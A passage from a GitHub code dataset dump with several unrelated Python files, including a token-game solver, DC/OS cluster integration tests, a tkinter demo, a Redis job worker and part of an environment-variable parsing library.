e:\n\t\tprint('=======ERROR======ERROR=======ERROR=======')\n\t\tprint(e)\n\t\tprint('=======ERROR======ERROR=======ERROR=======')\n","repo_name":"developmentMen/pySeFi","sub_path":"pySeFi.py","file_name":"pySeFi.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"15633845421","text":"# https://github.com/mission-peace/interview/blob/master/src/com/interview/dynamic/NPotGold.java\nimport numpy as np\n\n# def calculate(T, i, j):\n# return T[i][j] if i <= j else 0\n#\n\n# def max_win(tokens):\n# n = len(tokens)\n#\n# # priebezne maximalne vyhry\n# PLAYER_TAB = np.diag(tokens)\n#\n# for interval_size in range(1, n): # prechadzaju sa rozne velke intervaly\n#\n# for end in range(interval_size, n): # koniec intervalu\n# start = end - interval_size # zaciatok intervalu\n#\n# if start + 1 > end:\n# pick_from_start = 0 # tokens[start]\n# elif tokens[start + 1] > tokens[end]: # start start\n# pick_from_start = tokens[start] + calculate(PLAYER_TAB, start + 2, end)\n# else: # start end\n# pick_from_start = tokens[start] + calculate(PLAYER_TAB, start + 1, end - 1)\n#\n# if start > end - 1:\n# pick_from_end = 0 # tokens[end]\n# elif tokens[end - 1] > tokens[start]: # end end\n# pick_from_end = tokens[end] + calculate(PLAYER_TAB, start, end - 2)\n# else: # end start\n# pick_from_end = tokens[end] + calculate(PLAYER_TAB, start + 1, end - 1)\n#\n# PLAYER_TAB[start, end] = max(pick_from_start, pick_from_end)\n#\n# return PLAYER_TAB[0, n-1]\n\n\ndef max_win(tokens):\n n = len(tokens)\n\n # priebezne maximalne vyhry\n PLAYER_TAB = np.zeros((n, n), dtype=int)\n KRUPIER_TAB = np.zeros((n, n), dtype=int)\n\n for x in range(n):\n for end in range(x, n): # koniec intervalu\n start = end - x # zaciatok intervalu\n\n # parny interval => vybera hrac\n if (x+1) % 2 == 0:\n pick_from_start = tokens[start] + KRUPIER_TAB[start + 1, end]\n pick_from_end = tokens[end] + KRUPIER_TAB[start, end - 1]\n\n # neparny interval => vybera krupier\n else:\n pick_from_start = tokens[start]\n pick_from_end = tokens[end]\n\n # maximalna vyhra\n if pick_from_start > pick_from_end:\n PLAYER_TAB[start, end] = tokens[start] + KRUPIER_TAB[start + 1, end] # hrac zoberie zo zaciatku\n KRUPIER_TAB[start, end] = PLAYER_TAB[start + 1, end] # krupierovi ostane <start+1, end>\n else:\n PLAYER_TAB[start, end] = tokens[end] + KRUPIER_TAB[start, end - 1] # hrac zoberie z konca\n KRUPIER_TAB[start, end] = PLAYER_TAB[start, end - 1] # krupierovi ostane <start, end-1>\n\n return PLAYER_TAB[0, n - 1]\n\n\nif __name__ == '__main__':\n with open(\"cvicenie6data.txt\") as f:\n file_content = list(map(int, f.read()))\n\n print(max_win(file_content))\n","repo_name":"kirschovapetra/I-ADS","sub_path":"01_Cvičenia/Cv06/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"618047617","text":"#!/usr/local/bin/python3\n\n# plots the results from the speed analysis, which must be passed in as an argument\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport matplotlib.cm as cm\nimport matplotlib.colors as clr\nimport sys\n\ncontinuous, scene, tstep, runtime = np.loadtxt(sys.argv[1], skiprows=1, delimiter=',', unpack=True)\nnsteps = np.array(10 / tstep, dtype=int)\nscene = np.array(scene, dtype=int)\n\ntmap = {0.01:0, 0.05:1, 0.1:2, 0.8:3, 1.5:4}\n\nctimes = np.ndarray((8, 5))\ndtimes = np.ndarray((8, 5))\nnegclr = (0,0.8,0.3,1)\ntunnelclr = (0,0.3,0.8,1)\n\nneg = cm.Reds_r\nneg.set_bad(color=negclr)\n\nfor i in range(len(scene)//2):\n ctimes[scene[i]-1, tmap[tstep[i]]] = runtime[i]/nsteps[i]\nfor i in range(len(scene)//2, len(scene)):\n dtimes[scene[i]-1, tmap[tstep[i]]] = runtime[i]/nsteps[i]\n\nneg_mask = np.ma.masked_where(ctimes < 0, ctimes)\n\nctunnels = [(6,x) for x in tmap if x != 0.1]\ndtunnels = [(3,0.1), (3,0.8), (7, 0.8)]\ndtunnels += [(x,1.5) for x in range(1,9)]\ndtunnels += [(6,x) for x in tmap]\n\ntunnel = clr.LinearSegmentedColormap.from_list('tunnel', [(0,0,0,0), (0,0,0,0)], N=2)\ntunnel.set_bad(color=tunnelclr)\ncmasktmp = ctimes.copy()\nfor (i,j) in ctunnels:\n cmasktmp[i-1][tmap[j]] = -2\nctunnel_mask = np.ma.masked_where(cmasktmp == -2, cmasktmp)\n\ndmasktmp = dtimes.copy()\nfor (i,j) in dtunnels:\n dmasktmp[i-1][tmap[j]] = -2\ndtunnel_mask = np.ma.masked_where(dmasktmp == -2, dmasktmp)\n\naxsz = 15\nheadersz = 20\ntunnel_patch = mpatches.Patch(color=tunnelclr, label='Tunneling')\nneg_patch = mpatches.Patch(color=negclr, label='Infinite\\nLoop')\n\n\nfig, ax = plt.subplots()\nfig.set_tight_layout(True)\ncplot = ax.imshow(neg_mask, cmap=neg, vmin=0, extent=(-0.5,4.5, 8.5,0.5), aspect='equal')\nax.imshow(ctunnel_mask, cmap=tunnel, extent=(-0.5,4.5, 8.5,0.5), aspect='equal')\nax.set_ylabel(\"Test Scenario\", size=axsz)\nax.set_xlabel(\"Timestep index\", size=axsz)\ncpbar = fig.colorbar(cplot, ax=ax)\ncpbar.ax.set_ylabel(\"Real time (s) per timestep\", size=axsz)\nax.set_title(\"Continuous Collision\\nResponse\", size=headersz)\nfig.legend(handles=[tunnel_patch, neg_patch], loc=\"center left\", prop={'size' : axsz})\nplt.show()\n\nfig, ax = plt.subplots()\nfig.set_tight_layout(True)\ndplot = ax.imshow(dtimes, cmap=neg, extent=(-0.5,4.5, 8.5,0.5), aspect='equal')\nax.imshow(dtunnel_mask, cmap=tunnel, extent=(-0.5,4.5, 8.5,0.5), aspect='equal')\nax.set_ylabel(\"Test Scenario\", size=axsz)\nax.set_xlabel(\"Timestep index\", size=axsz)\ndpbar = fig.colorbar(dplot, ax=ax)\ndpbar.ax.set_ylabel(\"Real time (s) per timestep\", size=axsz)\nax.set_title(\"Discrete Collision\\nResponse\", size=headersz)\nfig.legend(handles=[tunnel_patch, neg_patch], loc=\"center left\", prop={'size' : axsz})\n\nplt.show()","repo_name":"lfdelta/RbodySim","sub_path":"speed_analysis.py","file_name":"speed_analysis.py","file_ext":"py","file_size_in_byte":2721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19791945286","text":"import json\nimport logging\nimport os\nimport subprocess\n\nimport kazoo.client\nimport pytest\nimport requests\n\n\n@pytest.mark.first\ndef test_cluster_is_up(cluster):\n pass\n\n\ndef test_if_all_mesos_masters_have_registered(cluster):\n # Currently it is not possible to extract this information through Mesos'es\n # API, let's query zookeeper directly.\n zk = kazoo.client.KazooClient(hosts=cluster.zk_hostports, read_only=True)\n master_ips = []\n\n zk.start()\n for znode in zk.get_children(\"/mesos\"):\n if not znode.startswith(\"json.info_\"):\n continue\n master = json.loads(zk.get(\"/mesos/\" + znode)[0].decode('utf-8'))\n master_ips.append(master['address']['ip'])\n zk.stop()\n\n assert sorted(master_ips) == cluster.masters\n\n\ndef test_if_all_exhibitors_are_in_sync(cluster):\n r = cluster.get('/exhibitor/exhibitor/v1/cluster/status')\n assert r.status_code == 200\n\n correct_data = sorted(r.json(), key=lambda k: k['hostname'])\n\n for zk_ip in cluster.public_masters:\n resp = requests.get('http://{}:8181/exhibitor/v1/cluster/status'.format(zk_ip))\n assert resp.status_code == 200\n\n tested_data = sorted(resp.json(), key=lambda k: k['hostname'])\n assert correct_data == tested_data\n\n\ndef test_mesos_agent_role_assignment(cluster):\n state_endpoint = '/state.json'\n for agent in cluster.public_slaves:\n r = cluster.get(path=state_endpoint, node=agent, port=5051)\n assert r.json()['flags']['default_role'] == 'slave_public'\n for agent in cluster.slaves:\n r = cluster.get(path=state_endpoint, node=agent, port=5051)\n assert r.json()['flags']['default_role'] == '*'\n\n\ndef test_signal_service(cluster):\n \"\"\"\n signal-service runs on an hourly timer, this test runs it as a one-off\n and pushes the results to the test_server app for easy retrieval\n \"\"\"\n # This is due to caching done by 3DT / Signal service\n # We're going to remove this soon: https://mesosphere.atlassian.net/browse/DCOS-9050\n dcos_version = os.environ[\"DCOS_VERSION\"]\n signal_config = open('/opt/mesosphere/etc/dcos-signal-config.json', 'r')\n signal_config_data = json.loads(signal_config.read())\n customer_key = signal_config_data.get('customer_key', '')\n enabled = signal_config_data.get('enabled', 'false')\n cluster_id_file = open('/var/lib/dcos/cluster-id')\n cluster_id = cluster_id_file.read().strip()\n\n if enabled == 'false':\n pytest.skip('Telemetry disabled in /opt/mesosphere/etc/dcos-signal-config.json... skipping test')\n\n print(\"Version: \", dcos_version)\n print(\"Customer Key: \", customer_key)\n print(\"Cluster ID: \", cluster_id)\n\n direct_report = cluster.get('/system/health/v1/report?cache=0')\n signal_results = subprocess.check_output([\"/opt/mesosphere/bin/dcos-signal\", \"-test\"], universal_newlines=True)\n r_data = json.loads(signal_results)\n\n exp_data = {\n 'diagnostics': {\n 'event': 'health',\n 'anonymousId': cluster_id,\n 'properties': {}\n },\n 'cosmos': {\n 'event': 'package_list',\n 'anonymousId': cluster_id,\n 'properties': {}\n },\n 'mesos': {\n 'event': 'mesos_track',\n 'anonymousId': cluster_id,\n 'properties': {}\n }\n }\n\n # Generic properties which are the same between all tracks\n generic_properties = {\n 'provider': cluster.provider,\n 'source': 'cluster',\n 'clusterId': cluster_id,\n 'customerKey': customer_key,\n 'environmentVersion': dcos_version,\n 'variant': 'open'\n }\n\n # Insert the generic property data which is the same between all signal tracks\n exp_data['diagnostics']['properties'].update(generic_properties)\n exp_data['cosmos']['properties'].update(generic_properties)\n exp_data['mesos']['properties'].update(generic_properties)\n\n # Insert all the diagnostics data programmatically\n master_units = [\n 'adminrouter-service',\n 'adminrouter-reload-service',\n 'adminrouter-reload-timer',\n 'cosmos-service',\n 'exhibitor-service',\n 'history-service',\n 'log-master-service',\n 'log-master-socket',\n 'logrotate-master-service',\n 'logrotate-master-timer',\n 'marathon-service',\n 'mesos-dns-service',\n 'mesos-master-service',\n 'metronome-service',\n 'signal-service']\n all_node_units = [\n '3dt-service',\n 'epmd-service',\n 'gen-resolvconf-service',\n 'gen-resolvconf-timer',\n 'minuteman-service',\n 'navstar-service',\n 'pkgpanda-api-service',\n 'pkgpanda-api-socket',\n 'signal-timer',\n 'spartan-service',\n 'spartan-watchdog-service',\n 'spartan-watchdog-timer']\n slave_units = [\n 'mesos-slave-service']\n public_slave_units = [\n 'mesos-slave-public-service']\n all_slave_units = [\n 'docker-gc-service',\n 'docker-gc-timer',\n '3dt-socket',\n 'adminrouter-agent-service',\n 'adminrouter-agent-reload-service',\n 'adminrouter-agent-reload-timer',\n 'log-agent-service',\n 'log-agent-socket',\n 'logrotate-agent-service',\n 'logrotate-agent-timer',\n 'rexray-service']\n\n master_units.append('oauth-service')\n\n for unit in master_units:\n exp_data['diagnostics']['properties'][\"health-unit-dcos-{}-total\".format(unit)] = len(cluster.masters)\n exp_data['diagnostics']['properties'][\"health-unit-dcos-{}-unhealthy\".format(unit)] = 0\n for unit in all_node_units:\n exp_data['diagnostics']['properties'][\"health-unit-dcos-{}-total\".format(unit)] = len(\n cluster.all_slaves + cluster.masters)\n exp_data['diagnostics']['properties'][\"health-unit-dcos-{}-unhealthy\".format(unit)] = 0\n for unit in slave_units:\n exp_data['diagnostics']['properties'][\"health-unit-dcos-{}-total\".format(unit)] = len(cluster.slaves)\n exp_data['diagnostics']['properties'][\"health-unit-dcos-{}-unhealthy\".format(unit)] = 0\n for unit in public_slave_units:\n exp_data['diagnostics']['properties'][\"health-unit-dcos-{}-total\".format(unit)] = len(cluster.public_slaves)\n exp_data['diagnostics']['properties'][\"health-unit-dcos-{}-unhealthy\".format(unit)] = 0\n for unit in all_slave_units:\n exp_data['diagnostics']['properties'][\"health-unit-dcos-{}-total\".format(unit)] = len(cluster.all_slaves)\n exp_data['diagnostics']['properties'][\"health-unit-dcos-{}-unhealthy\".format(unit)] = 0\n\n def check_signal_data():\n # Check the entire hash of diagnostics data\n assert r_data['diagnostics'] == exp_data['diagnostics']\n # Check a subset of things regarding Mesos that we can logically check for\n framework_names = [x['name'] for x in r_data['mesos']['properties']['frameworks']]\n assert 'marathon' in framework_names\n assert 'metronome' in framework_names\n # There are no packages installed by default on the integration test, ensure the key exists\n assert len(r_data['cosmos']['properties']['package_list']) == 0\n\n try:\n check_signal_data()\n except AssertionError as err:\n logging.info('System report: {}'.format(direct_report.json()))\n raise err\n","repo_name":"samchiang/DC-OS","sub_path":"packages/dcos-integration-test/extra/test_composition.py","file_name":"test_composition.py","file_ext":"py","file_size_in_byte":7340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35636478469","text":"import tkinter as tk\nfrom tkinter import * \nmy_w = tk.Tk()\nmy_w.geometry(\"200x200\") # Size of the window \nmy_w.title(\"www.plus2net.com\") # Adding a title\n\n# create one lebel \nmy_str = tk.StringVar()\nl1 = tk.Label(my_w, textvariable=my_str )\nl1.grid(row=1,column=2) \nmy_str.set(\"Hi I am main window\")\n# add one button \nb1 = tk.Button(my_w, text='Clik me to open new window',\n command=lambda:my_open())\nb1.grid(row=2,column=2) \n\ndef my_open():\n my_w_child=Toplevel(my_w) # Child window \n my_w_child.geometry(\"250x200\") # Size of the window \n my_w_child.title(\"www.plus2net.com\")\n\n l1 = tk.Label(my_w_child, text='Your Name', width=10 ) \n l1.grid(row=1,column=1) \n\n e1 = tk.Entry(my_w_child, width=20,bg='yellow') \n e1.grid(row=1,column=2)\n b2 = tk.Button(my_w_child, text='Submit',\n command=lambda:my_str.set(e1.get()))\n b2.grid(row=2,column=2) \n b3 = tk.Button(my_w_child, text=' Close Child',\n command=my_w_child.destroy)\n b3.grid(row=3,column=2)\n \nmy_w.mainloop()","repo_name":"FerGVargas/Dev.Full_Stack","sub_path":"Mundo 1/Missão Certificação/estudos/estudoImgs/testeWChild.py","file_name":"testeWChild.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"33483098500","text":"import numpy as np\nimport timeit\n\ndef randSurface(N): # Creates random surface matrix\n o = 3*N - 9\n ag = N*N - 3*N + 2\n surface = np.zeros(N*N)\n for i in range(0,ag):\n surface[i] = 1\n for i in range(ag,ag+o):\n surface[i] = 2\n surface = np.random.permutation(surface)\n surface = np.reshape(surface,(N,N))\n return surface\n\ndef oo(matrix,i,j,size): # Checks for O-O interaction\n E = 0\n if i == size-1:\n i = -1\n if j == size-1:\n j = -1\n if matrix[i,j+1] == 2 and matrix[i-1,j] == 2:\n E += 1\n if matrix[i-1,j] == 2 and matrix[i-1,j-1] == 2:\n E += 1\n if matrix[i-1,j-1] == 2 and matrix[i,j-1] == 2:\n E += 1\n if matrix[i,j-1] == 2 and matrix[i+1,j] == 2:\n E += 1\n if matrix[i+1,j] == 2 and matrix[i+1,j+1] == 2:\n E += 1\n if matrix[i+1,j+1] == 2 and matrix[i,j+1] == 2:\n E += 1\n return E\n\ndef agag(matrix,i,j,size): # Checks for Ag-Ag interaction\n E = 0\n if i == size-1:\n i = -1\n if j == size-1:\n j = -1\n if matrix[i,j+1] == 1 and matrix[i-1,j] == 1:\n E -= 1\n if matrix[i-1,j] == 1 and matrix[i-1,j-1] == 1:\n E -= 1\n if matrix[i-1,j-1] == 1 and matrix[i,j-1] == 1:\n E -= 1\n if matrix[i,j-1] == 1 and matrix[i+1,j] == 1:\n E -= 1\n if matrix[i+1,j] == 1 and matrix[i+1,j+1] == 1:\n E -= 1\n if matrix[i+1,j+1] == 1 and matrix[i,j+1] == 1:\n E -= 1\n return E\n\ndef ago(matrix,i,j,size): # Checks for Ag-O interaction\n E = 0\n if i == size-1:\n i = -1\n if j == size-1:\n j = -1\n if matrix[i,j+1] == 1 and matrix[i-1,j] != 1 and matrix[i-1,j-1] == 1 and matrix[i,j-1] == 1 and matrix[i+1,j] != 1 and matrix[i+1,j+1] == 1:\n E -= 4\n if matrix[i,j+1] != 1 and matrix[i-1,j] == 1 and matrix[i-1,j-1] == 1 and matrix[i,j-1] != 1 and matrix[i+1,j] == 1 and matrix[i+1,j+1] == 1:\n E -= 4\n if matrix[i,j+1] == 1 and matrix[i-1,j] == 1 and matrix[i-1,j-1] != 1 and matrix[i,j-1] == 1 and matrix[i+1,j] == 1 and matrix[i+1,j+1] != 1:\n E -= 4\n return E\n\n\n# Calculate the energy\ndef calculateEnergy(surface,size): # Find size from surface instead\n E = 0\n for i in range(size): \n for j in range(size):\n if surface[i,j] == 2:\n E += oo(surface,i,j,size)\n E += ago(surface,i,j,size)\n if surface[i,j] == 1:\n E += agag(surface,i,j,size)\n return E\n\nif __name__ == '__main__':\n runs = 100\n size = 5\n t0 = timeit.default_timer()\n for i in range(100):\n surface = randSurface(size)\n E = calculateEnergy(surface,size)\n t1 = timeit.default_timer()\n#print('The random surface structure is', surface)\n#print('The energy is', E)\n print('The total time for the calculation is',t1-t0, 'seconds')\n\n# Now try with optimized code\n def calculate_single_energy(surface):\n myboard = surface\n myboard_right_neighbor = np.roll(myboard,-1,axis=1)\n myboard_left_neighbor = np.roll(myboard,1,axis=1)\n myboard_upper_right_neighbor = np.roll(myboard,1,axis=0)\n myboard_lower_left_neighbor = np.roll(myboard,-1,axis=0)\n myboard_upper_left_neighbor = np.roll(myboard_left_neighbor,1,axis=0)\n myboard_lower_right_neighbor = np.roll(myboard_right_neighbor,-1,axis=0)\n\n # Ag triangles\n e1 = -3 * sum(sum((myboard == 1) * (myboard_right_neighbor == 1) * (myboard_upper_right_neighbor == 1)))\n e2 = -3 * sum(sum((myboard == 1) * (myboard_right_neighbor == 1) * (myboard_lower_right_neighbor == 1)))\n\n # O triangles\n e3 = 3 * sum(sum((myboard == 2) * (myboard_right_neighbor == 2) * (myboard_upper_right_neighbor == 2)))\n e4 = 3 * sum(sum((myboard == 2) * (myboard_right_neighbor == 2) * (myboard_lower_right_neighbor == 2)))\n\n # O in perfect 4 Ag setup\n e5 = -4 * sum(sum((myboard == 2) * (myboard_right_neighbor == 1) * (myboard_upper_right_neighbor == 1) * (myboard_upper_left_neighbor != 1) * (myboard_left_neighbor == 1) * (myboard_lower_left_neighbor == 1) * (myboard_lower_right_neighbor != 1) ))\n e6 = -4 * sum(sum((myboard == 2) * (myboard_right_neighbor != 1) * (myboard_upper_right_neighbor == 1) * (myboard_upper_left_neighbor == 1) * (myboard_left_neighbor != 1) * (myboard_lower_left_neighbor == 1) * (myboard_lower_right_neighbor == 1) ))\n e7 = -4 * sum(sum((myboard == 2) * (myboard_right_neighbor == 1) * (myboard_upper_right_neighbor != 1) * (myboard_upper_left_neighbor == 1) * (myboard_left_neighbor == 1) * (myboard_lower_left_neighbor != 1) * (myboard_lower_right_neighbor == 1) ))\n return e1+e2+e3+e4+e5+e6+e7\n\n t0 = timeit.default_timer()\n for i in range(100):\n surface = randSurface(size)\n E = calculate_single_energy(surface)\n t1 = timeit.default_timer()\n print('Now trying with more advanced algorithm')\n#print('The energy is',E)\n print('The total time for the calculation is',t1-t0,'seconds')\n","repo_name":"HenrikLundMortensen/surfaceProject","sub_path":"surfaceProject/energycalculations/calcenergy.py","file_name":"calcenergy.py","file_ext":"py","file_size_in_byte":5000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44472880902","text":"import sys\nfrom redis import Redis, exceptions as redisExeptions\nimport docker\nfrom time import sleep\nfrom random import choice\n\nredis = Redis(decode_responses=\"utf-8\")\n\nclient = docker.from_env()\n\ncontainer_name = \"redis-container\"\n\nif client.containers.get(container_name):\n print(\"container exists\")\nelse :\n try: \n redis_container = client.containers.run(\n image='redis:latest' ,\n name=f\"{container_name}\",\n ports={ '6379/tcp': 6379 },\n detach=True\n )\n sleep(20)\n except Exception as e:\n print(e)\n\n# Loop until Redis container is ready\nwhile True:\n try:\n # Ping Redis server\n response = redis.ping()\n\n # If response is PONG, Redis container is ready\n if response == True:\n print(\"Redis container is ready!\")\n break\n except redis.exceptions.ConnectionError:\n pass\n \n # Wait 1 second before trying again\n sleep(1)\n \nif len(redis.keys(\"job:*\")) == 0:\n # set jobs for test\n redis.hset(\"job:1\", mapping={\"stage\": \"0\", \"status\": \"new\"})\n redis.hset(\"job:2\", mapping={\"stage\": \"0\", \"status\": \"new\"})\n redis.hset(\"job:3\", mapping={\"stage\": \"0\", \"status\": \"new\"})\n redis.hset(\"job:4\", mapping={\"stage\": \"0\", \"status\": \"new\"})\n\n# worker to get one job and change the values\nif len(sys.argv) > 2:\n # get argument values\n sleep_time = int(sys.argv[1])\n worker_number = sys.argv[2]\n\n while True:\n # get all jobs from Redis and get one job\n jobs = redis.keys(\"job:*\")\n \n if not jobs:\n print(f\"No jobs available for worker {worker_number}. Sleeping for {sleep_time} seconds...\")\n sleep(sleep_time)\n continue\n \n current_job = choice(jobs)\n\n # Check for any other worker that fetched this job before or not\n if redis.exists(\"worker_\" + current_job):\n print(f\"job conflict {current_job}\")\n continue\n\n # Set worker key to reserve this job for this worker\n redis.set(\"worker_\" + current_job, worker_number)\n\n while True:\n try:\n sleep(sleep_time)\n \n pipeline = redis.pipeline()\n\n # use a watch command to monitor the job key for changes\n pipeline.watch(current_job)\n\n # check if the job has already been completed by another worker\n if redis.hget(current_job, \"status\") == \"done\":\n print(f\"Job {current_job} has already been completed.\")\n break\n\n # get the current values of the job key\n job_values = redis.hgetall(current_job)\n\n # update the stage and status values in the job key\n job_values[\"stage\"] = \"1\"\n job_values[\"status\"] = \"done\"\n\n # start a transaction using multi\n pipeline.multi()\n\n # update the job key with the new values\n pipeline.hset(current_job, mapping=job_values)\n\n # execute the transaction\n pipeline.execute()\n\n # print a message indicating the job was completed\n print(f\"Job {current_job} completed by worker {worker_number}.\")\n break\n\n except redisExeptions.WatchError:\n # another client changed the job key, so we need to retry\n print(f\"Transaction failed for worker {worker_number} on job {current_job}. Retrying...\")\n continue\n\n redis.delete(\"worker_\" + current_job)\n\nelse:\n print(\"Insufficient arguments. Please provide sleep time and worker number in arguments. example : x.py 20 1\")","repo_name":"a-malex/python-redis-small-projects","sub_path":"redis/04-redis-transaction-worker.py","file_name":"04-redis-transaction-worker.py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40343590934","text":"from __future__ import annotations\n\nimport re\nfrom enum import Enum, auto\nfrom functools import lru_cache\nfrom itertools import chain\nfrom typing import (\n Any,\n Callable,\n Dict,\n Generic,\n Iterable,\n Iterator,\n Mapping,\n Optional,\n Pattern,\n Tuple,\n Type,\n TypeVar,\n Union,\n)\n\nfrom envolved.utils import extract_from_option\n\n__all__ = [\"Parser\", \"BoolParser\", \"CollectionParser\", \"parser\"]\n\n\nBaseModel1: Optional[Type]\nBaseModel2: Optional[Type]\nTypeAdapter: Optional[Type]\n\ntry: # pydantic v2\n from pydantic import BaseModel as BaseModel2, TypeAdapter\n from pydantic.v1 import BaseModel as BaseModel1\nexcept ImportError:\n BaseModel2 = TypeAdapter = None\n try: # pydantic v1\n from pydantic import BaseModel as BaseModel1\n except ImportError:\n BaseModel1 = None\n\nT = TypeVar(\"T\")\n\nParser = Callable[[str], T]\nParserInput = Union[Parser[T], Type[T]]\n\nspecial_parser_inputs: Dict[ParserInput[Any], Parser[Any]] = {\n bytes: str.encode,\n}\n\nparser_special_instances: Dict[Type, Callable[[Any], Parser]] = {}\nif TypeAdapter is not None:\n parser_special_instances[TypeAdapter] = lambda t: t.validate_json\n\nparser_special_superclasses: Dict[Type, Callable[[Type], Parser]] = {}\nif BaseModel1 is not None:\n parser_special_superclasses[BaseModel1] = lambda t: t.parse_raw\nif BaseModel2 is not None:\n parser_special_superclasses[BaseModel2] = lambda t: t.model_validate_json\n\n\ndef complex_parser(x: str) -> complex:\n x = x.replace(\"i\", \"j\")\n return complex(x)\n\n\nspecial_parser_inputs[complex] = complex_parser\n\n\ndef parser(t: ParserInput[T]) -> Parser[T]:\n \"\"\"\n Coerce an object into a parser.\n :param t: The object to coerce to a parser.\n :return: The best-match parser for `t`.\n \"\"\"\n special_parser = special_parser_inputs.get(t)\n if special_parser is not None:\n return special_parser\n\n from_option = extract_from_option(t)\n if from_option is not None:\n return parser(from_option)\n\n for special_cls, parser_factory in parser_special_instances.items():\n if isinstance(t, special_cls):\n return parser_factory(t)\n\n if isinstance(t, type):\n for supercls, parser_factory in parser_special_superclasses.items():\n if issubclass(t, supercls):\n return parser_factory(t)\n\n if callable(t):\n return t\n\n raise TypeError(f\"cannot coerce type {t!r} to a parser\")\n\n\nclass BoolParser:\n \"\"\"\n A helper to parse boolean values from text\n \"\"\"\n\n def __init__(\n self,\n maps_to_true: Iterable[str] = (),\n maps_to_false: Iterable[str] = (),\n *,\n default: Optional[bool] = None,\n case_sensitive: bool = False,\n ):\n \"\"\"\n :param maps_to_true: An iterable of string values that should evaluate to True\n :param maps_to_false: An iterable of string values that should evaluate to True\n :param default: The behaviour for when the value is vacant from both the true iterable and the falsish iterable.\n :param case_sensitive: Whether the string values should match exactly or case-insensitivity.\n \"\"\"\n if not case_sensitive:\n maps_to_true = map(str.lower, maps_to_true)\n maps_to_false = map(str.lower, maps_to_false)\n\n self.truth_set = frozenset(maps_to_true)\n self.false_set = frozenset(maps_to_false)\n\n self.case_sensitive = case_sensitive\n self.default = default\n\n def __call__(self, x: str) -> bool:\n if not self.case_sensitive:\n x = x.lower()\n if x in self.truth_set:\n return True\n if x in self.false_set:\n return False\n if self.default is None:\n raise ValueError(\n f\"must evaluate to either true ({', '.join(self.truth_set)}) or\" f\" false ({', '.join(self.false_set)})\"\n )\n return self.default\n\n\nspecial_parser_inputs[bool] = BoolParser([\"true\"], [\"false\"])\n\nE = TypeVar(\"E\")\nG = TypeVar(\"G\")\n\nempty_pattern = re.compile(\"\")\n\nNeedle = Union[str, Pattern[str]]\n\n_no_regex_flags = re.RegexFlag(0)\n\n\ndef needle_to_pattern(n: Needle, flags: re.RegexFlag = _no_regex_flags) -> Pattern[str]:\n if isinstance(n, str):\n return re.compile(re.escape(n), flags)\n return n\n\n\nK = TypeVar(\"K\")\nV = TypeVar(\"V\")\n\n\ndef _duplicate_avoiding_dict(pairs: Iterator[Tuple[K, V]]) -> Dict[K, V]:\n \"\"\"\n The default output_type of CollectionParser.delimited_pairwise. Returns a dict from key-value pairs while\n ensuring there are no duplicate keys.\n \"\"\"\n ret = {}\n for k, v in pairs:\n if k in ret:\n raise ValueError(f\"duplicate key {k}\")\n ret[k] = v\n return ret\n\n\nclass CollectionParser(Generic[G, E]):\n \"\"\"\n A parser that splits a string by a delimiter, and parses each part individually.\n \"\"\"\n\n def __init__(\n self,\n delimiter: Needle,\n inner_parser: ParserInput[E],\n output_type: Callable[[Iterator[E]], G] = list, # type: ignore[assignment]\n opener: Needle = empty_pattern,\n closer: Needle = empty_pattern,\n ):\n \"\"\"\n :param delimiter: The delimiter to split by.\n :param inner_parser: The inner parser to apply to each element.\n :param output_type: The aggregator function of all the parsed elements.\n :param opener: Optional opener that must be present at the start of the string.\n :param closer: Optional closer that must be present at the end of the string.\n \"\"\"\n self.delimiter_pattern = needle_to_pattern(delimiter)\n self.inner_parser = parser(inner_parser)\n self.output_type = output_type\n self.opener_pattern = needle_to_pattern(opener)\n self.closer_pattern = needle_to_pattern(closer)\n\n def __call__(self, x: str) -> G:\n opener_match = self.opener_pattern.match(x)\n if not opener_match:\n raise ValueError(\"position 0, expected opener\")\n x = x[opener_match.end() :]\n raw_elements = self.delimiter_pattern.split(x)\n closer_matches = self.closer_pattern.finditer(raw_elements[-1])\n\n closer_match = None\n for closer_match in closer_matches: # noqa: B007\n pass\n if not closer_match:\n raise ValueError(\"expected string to end in closer\")\n elif closer_match.end() != len(raw_elements[-1]):\n raise ValueError(\n \"expected closer to match end of string, got unexpected suffix: \"\n + raw_elements[-1][closer_match.end() :]\n )\n\n raw_elements[-1] = raw_elements[-1][: closer_match.start()]\n elements = (self.inner_parser(r.strip()) for r in raw_elements)\n return self.output_type(elements)\n\n @classmethod\n def pair_wise_delimited(\n cls,\n pair_delimiter: Needle,\n key_value_delimiter: Needle,\n key_type: ParserInput[K],\n value_type: Union[ParserInput[V], Mapping[K, ParserInput[V]]],\n output_type: Callable[[Iterator[Tuple[K, V]]], G] = _duplicate_avoiding_dict, # type: ignore[assignment]\n *,\n key_first: bool = True,\n **kwargs: Any,\n ) -> Parser[G]:\n \"\"\"\n Create a collectionParser that aggregates to key-value pairs.\n :param pair_delimiter: The separator between different key-value pairs.\n :param key_value_delimiter: The separator between each key and value.\n :param key_type: The parser for key elements.\n :param value_type: The parser for value elements. Can also be a mapping, parsing each key under a different\n parser.\n :param output_type: The tuple aggregator function. Defaults to a duplicate-checking dict.\n :param key_first: If set to false, will evaluate the part behind the key-value separator as a value.\n :param kwargs: forwarded to `CollectionParser.__init__`\n \"\"\"\n key_value_delimiter = needle_to_pattern(key_value_delimiter)\n key_parser = parser(key_type)\n get_value_parser: Callable[[K], Parser]\n if isinstance(value_type, Mapping):\n\n @lru_cache(None)\n def get_value_parser(key: K) -> Parser[V]:\n return parser(value_type[key])\n else:\n _value_parser = parser(value_type)\n\n def get_value_parser(key: K) -> Parser[V]:\n return _value_parser\n\n def combined_parser(s: str) -> Any:\n split = 